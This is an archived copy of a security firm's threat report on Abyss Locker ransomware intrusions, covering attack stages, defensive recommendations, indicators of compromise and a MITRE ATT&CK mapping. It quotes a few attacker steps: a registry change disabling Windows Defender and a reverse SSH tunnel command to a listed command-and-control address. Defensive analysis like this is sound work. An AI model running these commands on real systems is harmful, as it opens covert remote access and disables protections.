{
	"id": "621dc84a-7b44-4202-99b7-c3b889efecba",
	"created_at": "2026-04-06T02:12:29.480036Z",
	"updated_at": "2026-04-10T03:21:47.879039Z",
	"deleted_at": null,
	"sha1_hash": "399acba66ec6d9665953e1da31f5ea370cc039d6",
	"title": "The Anatomy of Abyss Locker Ransomware Attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3110554,
	"plain_text": "The Anatomy of Abyss Locker Ransomware Attack\r\nBy Sygnia\r\nPublished: 2025-02-04 · Archived: 2026-04-06 01:57:50 UTC\r\nAbyss Locker ransomware targets critical network devices with swift, disruptive attacks. This blog breaks down its tactics\r\nand defense strategies.\r\nAbigail See, Zhongyuan (Aaron) Hau, Ren Jie Yow, Yoav Mazor, Omer Kidron, Oren Biderman\r\n4 February 2025\r\n16 min\r\nExecutive Summary\r\nAbyss Locker (AKA Abyss ransomware) is a relatively new threat group that emerged in 2023, specializing in swift\r\nand decisive intrusions designed to cripple victims with ransomware. \r\nAbyss Locker was active throughout 2024, causing multiple incidents investigated by Sygnia. However, no recent\r\ntechnical blogs provide detailed insights into the group’s modus operandi.  \r\nThe threat actors behind Abyss Locker consistently employ a TTP of deploying malware on critical network devices\r\nto tunnel their activity within the network. This includes targeting VPN appliances, network- attached storage (NAS)\r\nand ESXi servers. \r\nIn this blog, we break down the attack flow of an Abyss Locker ransomware intrusion, highlight common TTPs and\r\nprovide actionable recommendations on how to defend against these techniques.  \r\nIncident Attack Flow\r\nInitial Access\r\nSygnia has observed that Abyss Locker intrusions typically begin with the exploitation of unpatched VPN appliances. For\r\nexample, the threat actor exploited known vulnerabilities, such as CVE-2021-20038, in an unpatched SonicWall VPN\r\nappliance. By exploiting the VPN appliance, the threat actor gained access to internal network devices and hosts, deploying\r\nadditional tunneling tools to maintain persistence and facilitate further access. \r\nCredential Harvesting\r\nOnce inside the compromised network, Abyss Locker frequently targets backup appliances. These appliances often utilize\r\nhigh-privileged service accounts, which are required for access to network resources for back up operations. The threat actor\r\nhas been observed multiple times leveraging several modified versions of 'Veeam-Get-Creds.ps1'\r\n1\r\n , an open-source\r\nPowerShell tool available in the ‘Veeam Credential Recovery’ GitHub project2 , to harvest credentials of local and domain\r\naccounts stored in the Veeam backup system.\r\nIn one instance, a PowerShell script named ‘veeam11.ps1’, which shared significant code similarities with ‘Veeam-Get-Creds.ps1’, was executed.\r\nhttps://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/\r\nPage 1 of 13\n\nFigure 1: Snippet from Windows event log showing the execution of the PowerShell script ‘veeam11.ps1’.\r\nIn another instance, an obfuscated version of ‘Veeam-Get-Creds.ps1’ was deployed.\r\nFigure 2: Snippet from Windows event log showing the execution of obfuscated ‘Veeam-Get-Creds.ps1’.\r\nAnother credential harvesting technique observed involved remotely dumping the Windows Security Account Manager\r\n(SAM) and Security registry hives on compromised hosts to obtain credential material.\r\nDefense Evasion\r\nThe threat actors behind Abyss Locker employ multiple techniques to evade detection and disable security controls on\r\ncompromised hosts:\r\nDisable Windows Defender by modifying and setting the registry key\r\n‘HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender” /v DisableAntiSpyware’ value to\r\n‘1’.\r\nRemove EDR agents or stop their process by using the Task Manager or running as the SYSTEM account on\r\ncompromised devices.\r\nUse Bring Your Own Vulnerable Driver (BYOVD) techniques to disable endpoint protection controls. For\r\nexample:\r\n The ‘UpdateDrv.sys’ driver from Zemana Anti-Logger was observed being used to install a malicious service\r\n(‘UpdateSVC’) that disables security controls.\r\nAdditional vulnerable drivers, such as ‘ped.sys’ (from Process Explorer) and ‘3ware.sys’, were also leveraged\r\nfor similar purposes.\r\nhttps://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/\r\nPage 2 of 13\n\nDeploy and execute anti-virus and EDR killer executables such as ‘SophosAV.exe’ and ‘auSophos.exe’ to disable\r\nendpoint protection on compromised devices.\r\nCommand and Control Tools\r\nDuring their intrusions, Abyss Locker operators deploy multiple tools and malware to maintain persistence using centralized\r\nfocal points for Command-and-Control (C2) communications.\r\nSygnia observed a heavy reliance on SSH/SOCKS tunneling, using open-source tools such as Chisel3 and the native SSH\r\nbinary. After gaining access into the environment and performing reconnaissance, these tunneling tools are strategically\r\ndeployed on critical network devices, including ESXi hosts, Windows hosts, VPN appliances, and network attached storage\r\n(NAS) devices.\r\nBy targeting these devices, the attackers ensure robust and reliable communication channels to maintain access and\r\norchestrate their malicious activities across the compromised network.\r\nFigure 3: Diagram illustrating the different tunneling methods used by the threat actor.\r\nWindows SSH Tunneling Backdoor\r\nThe threat actors deployed an OpenSSH-based tool on Windows hosts to act as an SSH tunnel via remote port-forwarding,\r\nin order to maintain a connection to a remote C2 server. A PowerShell script named ‘deploy443.ps1’ was used to install the\r\ntool on compromised assets as a persistent service under the name ‘WMI Helper Agent’.\r\nThis deployment PowerShell script leveraged the executable ‘WinSW-x64.exe’ from the ‘Windows Service Wrapper in a\r\npermissive license’ GitHub project4, which is designed to wrap and manage any application as a Windows service. To evade\r\ndetection, the executable was named ‘wmihelper.exe’, mimicking the legitimate WMIHelper process.\r\nhttps://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/\r\nPage 3 of 13\n\nFigure 4: Snippet from the PowerShell script ‘deploy443.ps1’ showing the GitHub project URL of the\r\nWindows Service Wrapper executable.\r\nAdditionally, the ‘deploy443.ps1’ script created several supporting files for the service setup, including a configuration XML\r\nfile named ‘wmihelper.xml’, which defined the service parameters. These parameters include:\r\nThe C2 server IP address and port for the reverse shell: 64.95.12[.]57:443.\r\nThe private key used for the SSH session authentication, stored at\r\n‘C:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Wmi\\wmihelper.key’.\r\nThe SSH remote port-forwarding – using multiple different ports such as 43801.\r\nFigure 5: Snippet from the configuration file ‘wmihelper.xml’ showing the SSH remote port-forwarding\r\ncommand line.\r\nESXi SSH Tunneling\r\nAbyss Locker often targets VMware ESXi appliances within target networks. These appliances are both reliable and stable\r\nwithin the network and provide access to the internal virtual servers hosted on them.  Sygnia observed that the attackers\r\noften achieve compromise by tunneling through the organization’s VPN and pivoting to the VMware ESXi host, where they\r\nset up an additional SSH tunnel.\r\nFigure 6: Illustration showing the SSH tunneling involving the VPN appliance and ESXi host.\r\nIf SSH access is disabled on the ESXi host, the threat actor enables it by initiating the SSH daemon ‘sshd’ process. Once\r\nSSH access is established, they utilize the native SSH binary to connect to their Command-and-Control (C2) server,\r\nleveraging the ESXi host as a pivot point to scan the network.\r\nFigure 7: Snippet from the ‘hostd.log’ file on the ESXi host showing that SSH access was enabled.\r\nFigure 8: Snippet from the authentication log showing the SSH session authentication to the ESXi server.\r\nTo establish a reverse SSH tunnel to back to their C2 server, the threat actor executes a command similar to ‘SSH -p 443 -N -\r\nf -o ServerAliveInterval=240 -o StrictHostKeyChecking=no -R 127.0.0.1:48000 support@64.95.12[.]70’\r\nhttps://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/\r\nPage 4 of 13\n\nFigure 9: Snippet from the authentication log showing the SSHD connections to internal servers.\r\nNAS Device Tunneling Tool\r\nNAS devices are another common target exploited by Abyss Locker. These devices are often used as pivot points to tunnel\r\ntraffic into the corporate network, enabling further intrusion and lateral movement. The observed compromise flow on these\r\ndevices typically involves the following steps:\r\n1. Access the NAS web interface (e.g., ‘DiskStation Manager – DSM’) using the ‘admin’ account from an internal IP\r\naddress.\r\n2. Enable the SSH service through the DSM.\r\n3. Connect to the NAS device via SSH.\r\n4. Create a backdoor user named ‘support’ and add this account to a privileged group.\r\nFigure 10: Snippet from the ‘synoconndb’ log from the NAS server showing that the SSH service was enabled.\r\nAfter compromising the NAS devices, the threat actor deploys a tunneling tool, often using ‘Chisel’, an open-source utility5\r\nthat enables tunneling, to connect the asset to their C2 infrastructure. To evade detection, the threat actor often renames these\r\ntools as legitimate processes, such as ‘apache2’.\r\nNext, the threat actor attempts to clear the bash history on the compromised devices to remove traces of their activities and\r\nreduce the likelihood of detection.\r\nFigure 11: Snippet from Bash history of the NAS server showing the deployment of the ‘Chisel’ tool renamed\r\nas ‘apache2’.\r\nFigure 12: Snippet from Bash history of the NAS server showing the attempts to clear bash history.\r\nLateral Movement\r\nhttps://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/\r\nPage 5 of 13\n\nAbyss Locker leverages multiple off-the-shelf tools to move laterally within the network, primarily relying on compromised\r\ncredentials to access and navigate between devices. Commonly used tools include PsExec, and scripts from the open-source\r\nproject Impacket6 such as SMBExec and ATExec.\r\nThe execution of PsExec results in the creation of key files on the target machine, which include the hostname of the source\r\nhost in its filename. These hostnames are in fact machines that belong to the threat actor.\r\nFigure 13: Snippet showing USN Journal entry of PsExec .key file with the source host ‘ADMINIS-F69E5L3’.\r\nFigure 14: Snippet showing USN Journal entry of PsExec .key file with the source host ‘DESKTOP-VM4QKN6’.\r\nExfiltration\r\nTo exfiltrate data from the network, Abyss Locker utilize the command-line tool ‘Rclone’7. Consistent with their approach\r\nto evasion, the threat actors rename the ‘Rclone’ executable to other names such as ‘ltsvc.exe’ to evade detection. Using\r\n‘Rclone’ the threat actor exfiltrates stolen data primarily to two legitimate cloud storage providers: Amazon Web Services\r\n(AWS) and BackBlaze. The tool was configured with filters to target specific file extensions, allowing the threat actors to\r\nselectively exfiltrate data of interest while avoiding unnecessary files\r\nFigure 15: A snippet of the help documentation for ‘ltsvc.exe’ showing identical content to that of RClone.\r\nhttps://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/\r\nPage 6 of 13\n\nFigure 16: Snippet showing the content of the filter XML file used with RClone to control the type of files\r\nbeing exfiltrated.\r\nEncryption\r\nAfter achieving full access to the network and exfiltrating sufficient data, Abyss Locker deploys its ransomware. The\r\nransomware targets both Windows systems and ESXi hosts, using distinct file extensions for encrypted files:\r\n‘.Abyss’ on Windows systems\r\n‘.crypt’ on ESXi hosts\r\nAs part of the encryption process, the ransomware creates ransom notes on compromised systems under the name\r\n‘WhatHappened.txt’. Additionally, Abyss Locker attempts to delete volume shadow copies from affected hosts, hindering\r\ndata recovery efforts.\r\nDefending Against Abyss Locker\r\nThe following recommendations reflect Sygnia’s strategic approach to mitigating Abyss Locker and similar threat actors.\r\nRooted in security best practices, they align with a recommended security baseline to strengthen your organization’s\r\nresilience against advanced ransomware threats.\r\nPrevent\r\n1. Secure Edge Devices: Limit traffic to essential protocols, block access to management interfaces, use Geo-IP\r\nrestrictions, and configure firewalls to inspect traffic and block management ports.\r\n2. Implement Network Segmentation: Micro-segment critical infrastructure into isolated VLANs to inhibit lateral\r\nmovement, separate management from backup traffic using firewalls, and enforce inter-VLAN communication\r\nthrough stateful firewalls permitting only essential traffic.\r\n3. Protect Credentials: Enforce PAM solutions, mitigate SAM dumping with Credential Guard, reduce local admin\r\nprivileges, and audit registry access attempts.\r\n4. Ensure Backup Security: Use immutable storage with AES-256 encryption and isolate backups in dedicated\r\nVLANs with strict firewall rules.\r\n5. Protect Endpoints: Remove vulnerable drivers, restrict kernel-mode driver installation, enable tamper protection in\r\nEDR solutions, and enforce execution of only signed, approved binaries through application control policies.\r\nDetect\r\nhttps://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/\r\nPage 7 of 13\n\n1. Monitor Activity on Edge Devices: Monitor SSH and SOCKS tunneling activity with tools like Chisel and filter\r\nDNS traffic for anomalous C2 queries using tools like Cisco Umbrella or OpenDNS.\r\n2. Monitor ESXi and NAS: Monitor ESXi logs for unauthorized SSH access or administrative changes, and configure\r\nalerts for NAS configuration changes, creation of new user accounts, or log tampering attempts. For a guide on\r\nmonitoring and conducting threat hunting on ESXi devices, refer to Sygnia’s blog: https://www.sygnia.co/blog/esxi-ransomware-ssh-tunneling-defense-strategies/\r\n3. Forward Logs for Analysis: Deploy Sysmon (Windows) or Auditd/Osquery (Linux) for monitoring, and forward\r\nlogs to a centralized SIEM to detect ransomware behaviours like rapid file changes or malicious script execution.\r\n4. Enable Backup Tampering Detection: Set alerts for suspicious backup activities, such as mass deletion or retention\r\npolicy changes, and enable immutable logging for all backup operations.\r\nGovern\r\n1. Implement Access Governance: Implement strict RBAC across critical systems, enforce MFA for management\r\ninterfaces secured via jump servers, and use authentication silos to restrict service account logins.\r\n2. Conduct Timely Patch Management and Vulnerability Mitigation: Patch critical systems within seven days of\r\nrelease or immediately for known exploits, and conduct regular vulnerability scans, prioritizing remediation.\r\n3. Require Privileged Identity Management (PIM): Require one-time passwords for privileged accounts and\r\nregularly audit them to remove unused or excessive permissions.\r\nAppendix I – Indicators of compromise\r\nDescription   Type Indicator of Compromise\r\nBackdoor\r\n(wmihelper.exe)\r\nFile c:\\users\\\u003cUSER\u003e\\appdata\\roaming\\microsoft\\wmi\\wmihelper.exe\r\nBackdoor\r\n(wmihelper.exe)\r\nFile C:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Wmi\\wmihelpe\r\nBackdoor\r\n(wmihelper.exe)\r\nSHA1 59a97f9d7c1d6e10fa41ea9339568fb25ec55e27\r\nBackdoor\r\n(wmihelper.exe)\r\nSHA256 05b82d46ad331cc16bdc00de5c6332c1ef818df8ceefcd49c726553209b3a0da\r\nBackdoor\r\n(wmihelper.exe)\r\nService\r\nName\r\nWMI helper agent\r\nBackdoor\r\nConfig File\r\n(wmihelper.exe)\r\nFile wmihelper.xml\r\nBackdoor\r\nauthentication\r\nprivate key\r\n(wmihelper.exe)\r\nFile wmihelper.key\r\nBackdoor\r\n(chisel)\r\nFile /bin/apache2\r\nBackdoor\r\n(chisel)\r\nSHA1 3f90fd241e9422cc447b5ccdcb87d72507f37e6f\r\nhttps://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/\r\nPage 8 of 13\n\nDescription   Type Indicator of Compromise\r\nBackdoor\r\n(chisel)\r\nSHA256 6042a84529958a04a2d46384139da3ef016bf9498e791cd5e34dfecec2baa1d2\r\nRemcom File C:\\Windows\\uFmAnlZR.exe\r\nRemcom SHA1 23873bf2670cf64c2440058130548d4e4da412dd\r\nRemcom SHA256 3C2FE308C0A563E06263BBACF793BBE9B2259D795FCC36B953793A7E499E7F71\r\nLinux\r\nencryptor\r\nFile /tmp/e.elf\r\nLinux\r\nencryptor\r\nSHA1 e44ec82d0d80c754afcd7ed149c263c55d158259\r\nLinux\r\nencryptor\r\nSHA256 5fba25759423f9efc92592977f6c9ff77d47a20aa8ec8e9cd17d5cfa786a1852\r\nWindows\r\nencryptor\r\nFile C:\\Users\\\u003cUSER\u003e\\Desktop\\e\\e.exe\r\nWindows\r\nencryptor\r\nSHA1 13112e672d807fa7c7f8a383ecfa31e85b880e5a\r\nWindows\r\nencryptor\r\nSHA256 cd9d88cccd85209966c5a35aba7751b962bcc021a4216d6addfc0c3462ce80da\r\n‘Rclone’ utility File C:\\Windows\\System32\\rclone\r\n‘Rclone’ utility File C:\\Windows\\System32\\LTSVC.exe\r\n‘Rclone’ utility\r\n(Filter file)\r\nFile C:\\Windows\\System32\\filter.txt\r\nAnti-virus killer File C:\\Windows\\Temp\\SophosAV.exe\r\nAnti-virus killer\r\n(SophosAV.exe)\r\nService\r\nName\r\nSophos AV\r\nAnti-virus killer File C:\\ProgramData\\USOShared\\auSophos.exe\r\nAnti-virus killer File C:\\ProgramData\\USOShared\\UpdateSvc.exe\r\nAnti-virus killer\r\n(UpdateSvc.exe)\r\nSHA256 f9ab649acfe76d6ac088461b471e5d981bdc8b71d940e94c63bc1988a2ed4678\r\nAnti-virus killer\r\n(UpdateSvc.exe)\r\nService\r\nName\r\nUpdateSVC\r\nSecurity control\r\ndisabling tool\r\n(powerrun)\r\nFile c:\\programdata\\pr.exe\r\nSecurity control\r\ndisabling tool\r\n(powerrun)\r\nSHA1 f24ca204af2237a714e8b41d54043da7bbe5393b\r\nhttps://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/\r\nPage 9 of 13\n\nDescription   Type Indicator of Compromise\r\nSecurity control\r\ndisabling tool\r\n(powerrun)\r\nSHA256 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2\r\nMalicious\r\nPowerShell\r\nscript\r\nFile C:\\ProgramData\\deploy443.ps1\r\nVeeam-Get-Creds.ps1\r\nFile veeam11.ps1\r\nVulnerable\r\ndriver\r\nFile C:\\ProgramData\\USOShared\\UpdateDrv.sys\r\nVulnerable\r\ndriver\r\n(UpdateDrv.sys)\r\nSHA256 d48c7f13db60ef615e59773c442485e84acef09343375d0d8a462b285e959baa\r\nVulnerable\r\ndriver\r\nFile ped.sys\r\nVulnerable\r\ndriver (ped.sys)\r\nSHA1 17d9200843fe0eb224644a61f0d1982fac54d844\r\nVulnerable\r\ndriver (ped.sys)\r\nSHA256 d76c74fc7a00a939985ae515991b80afa0524bf0a4feaec3e5e58e52630bd717\r\nVulnerable\r\ndriver\r\nFile 3ware.sys\r\nVulnerable\r\ndriver\r\n(3ware.sys)\r\nSHA1 82780c0c1c0e04d994c770a3b3e73727528b0451\r\nVulnerable\r\ndriver\r\n(3ware.sys)\r\nSHA256 0d9089efe2a28630bc21d8db451ec14dc856c2d40444292c42e7cca218c7029e\r\nHostname\r\nHost\r\nname\r\nDESKTOP-VM4QKN6\r\nHostname\r\nHost\r\nname\r\nADMINIS-F69E5L3\r\nC2\r\nIP\r\nAddress\r\n139.180.135.191\r\nC2\r\nIP\r\nAddress\r\n67.217.228.101\r\nC2\r\nIP\r\nAddress\r\n64.95.12.57\r\nC2\r\nIP\r\nAddress\r\n64.95.12.70\r\nhttps://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/\r\nPage 10 of 13\n\nAppendix II: MITRE ATT\u0026CK Matrix Mapping\r\n1. Initial Access\r\nT1133 – External Remote Services\r\n2. Persistence\r\nT1543.003 – Create or Modify System Process: Windows Service\r\nT1136.001 – Create Account: Local Account\r\n3. Privilege Escalation\r\nT1078 – Valid Accounts: Local Accounts\r\nT1068 – Exploitation for Privilege Escalation\r\n4. Defense Evasion\r\nT1562.001 – Impair Defenses: Disable or Modify Tools\r\nT1036.005 – Masquerading: Match Legitimate Name or Location\r\n5. Credential Access \r\nT1555 – Credentials from Password Stores \r\nT1003.002 – OS Credential Dumping: Security Account Manager (SAM)\r\n6. Discovery \r\nT1046 – Network Service Discovery  \r\n7. Lateral Movement \r\nT1021.001 – Remote Services: Remote Desktop Protocol \r\nT1021.004 – Remote Services: SSH \r\nT1570 – Lateral Tool Transfer \r\n8. Collection \r\nT1005 – Data from Local System \r\nT1039 – Data from Network Shared Drive \r\n9. Command and Control  \r\nT1071.001 – Application Layer Protocol: Web Protocols \r\nT1219 – Remote Access Software\r\nT1572 – Protocol Tunneling\r\n10. Exfiltration \r\nT1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage \r\n11. Impact \r\nT1486 – Data Encrypted for Impact\r\nT1490 – Inhibit System Recovery \r\nAppendix III – Mapping Attack Technics to Mitigations\r\nAttack\r\nTechniques\r\nPrevent Detect Govern\r\nExploiting\r\nunpatched VPN\r\nappliances\r\nPatch VPN appliances\r\nand implement\r\nfirewalls/WAFs; restrict\r\nmanagement port access.\r\nMonitor and alert for\r\nanomalies in VPN\r\ntraffic; inspect logs for\r\nmanagement access\r\nattempts.\r\nApply patches promptly\r\nand conduct\r\nvulnerability scans\r\nregularly.\r\nCredential\r\nharvesting via\r\nSAM dumping\r\nImplement Credential\r\nGuard; enforce PAM for\r\nservice and local admin\r\naccounts.\r\nAudit access to SAM and\r\nSecurity registry hives;\r\nanalyze logs for\r\ncredential dumping\r\nattempts.\r\nAudit and reduce\r\nprivileges of admin\r\naccounts; enforce\r\npassword rotation\r\npolicies.\r\nhttps://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/\r\nPage 11 of 13\n\nAttack\r\nTechniques\r\nPrevent Detect Govern\r\nDisabling\r\nendpoint\r\nprotection\r\nConfigure tamper\r\nprotection for EDR\r\nsolutions; disable\r\nvulnerable drivers.\r\nForward logs to SIEM\r\nfor tamper detection;\r\nmonitor EDR events for\r\ndisabling attempts.\r\nUse authentication silos\r\nto restrict privileged\r\naccess; enforce RBAC\r\npolicies.\r\nSSH/SOCKS\r\ntunneling for C2\r\nRestrict SSH/SOCKS\r\ntraffic using firewalls;\r\nmicro-segment critical\r\ninfrastructure.\r\nConfigure alerts for\r\nSSH/SOCKS activity;\r\nmonitor DNS queries for\r\nunusual domains.\r\nEstablish strict RBAC\r\nfor critical assets;\r\nmandate MFA for all\r\nmanagement access.\r\nTargeting NAS\r\nand ESXi devices\r\nEnforce immutable\r\nstorage; isolate NAS and\r\nESXi VLANs with strict\r\nfirewall rules.\r\nMonitor NAS/ESXi logs\r\nfor unauthorized access\r\nand configuration\r\nchanges.\r\nRegularly audit NAS\r\nand ESXi accounts and\r\nconfigurations for\r\ncompliance.\r\nEncrypting\r\nbackups to\r\nprevent recovery\r\nUse immutable storage\r\nand isolate backup\r\nsystems from the\r\nproduction network.\r\nSet alerts for\r\nmodifications to backup\r\npolicies or deletion of\r\nbackups.\r\nReview and enforce\r\nbackup access policies;\r\nmandate audits for\r\nrecovery readiness.\r\nLateral\r\nmovement using\r\ncompromised\r\ncredentials\r\nRestrict account access\r\nusing ‘Log On To’\r\npolicies; enforce MFA\r\nfor privileged access.\r\nCorrelate lateral\r\nmovement attempts in\r\nSIEM; monitor\r\nanomalous logins or\r\naccess attempts.\r\nConduct regular audits\r\nof privileged accounts;\r\nenforce role-based\r\npermissions.\r\nPersistent\r\nfoothold through\r\nedge devices and\r\nNAS\r\nBlock egress traffic from\r\nedge devices and NAS\r\nusing restrictive firewall\r\nrules.\r\nMonitor unusual\r\noutbound traffic from\r\nedge devices and NAS;\r\nalert for unauthorized\r\nexternal connections.\r\nEstablish strict egress\r\npolicies for edge devices\r\nand NAS; regularly\r\naudit outbound firewall\r\nrules.\r\nIf you were impacted by this attack or are seeking guidance on how to prevent similar attacks, please contact us at\r\ncontact@sygnia.co or our 24-hour hotline +1-877-686-8680. \r\nContributors: Eldad Hoshen, Ofir Almkias, Luis Garcia.\r\n1. https://github.com/sadshade/veeam-creds/blob/main/Veeam-Get-Creds.ps1 ↩︎\r\n2. https://github.com/sadshade/veeam-creds ↩︎\r\n3. https://github.com/jpillora/chisel ↩︎\r\n4. https://github.com/winsw/winsw ↩︎\r\n5. https://github.com/jpillora/chisel ↩︎\r\n6. https://github.com/fortra/impacket ↩︎\r\n7. https://github.com/rclone/rclone ↩︎\r\nThis advisory and any information or recommendation contained herein has been prepared for general informational\r\npurposes and is not intended to be used as a substitute for professional consultation on facts and circumstances specific to\r\nany entity. While we have made attempts to ensure the information contained herein has been obtained from reliable sources\r\nand to perform rigorous analysis, this advisory is based on initial rapid study, and needs to be treated accordingly. Sygnia is\r\nhttps://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/\r\nPage 12 of 13\n\nnot responsible for any errors or omissions, or for the results obtained from the use of this Advisory. This Advisory is\r\nprovided on an as-is basis, and without warranties of any kind.\r\nSource: https://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/\r\nhttps://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/"
	],
	"report_names": [
		"abyss-locker-ransomware-attack-analysis"
	],
	"threat_actors": [],
	"ts_created_at": 1775441549,
	"ts_updated_at": 1775791307,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/399acba66ec6d9665953e1da31f5ea370cc039d6.pdf",
		"text": "https://archive.orkl.eu/399acba66ec6d9665953e1da31f5ea370cc039d6.txt",
		"img": "https://archive.orkl.eu/399acba66ec6d9665953e1da31f5ea370cc039d6.jpg"
	}
}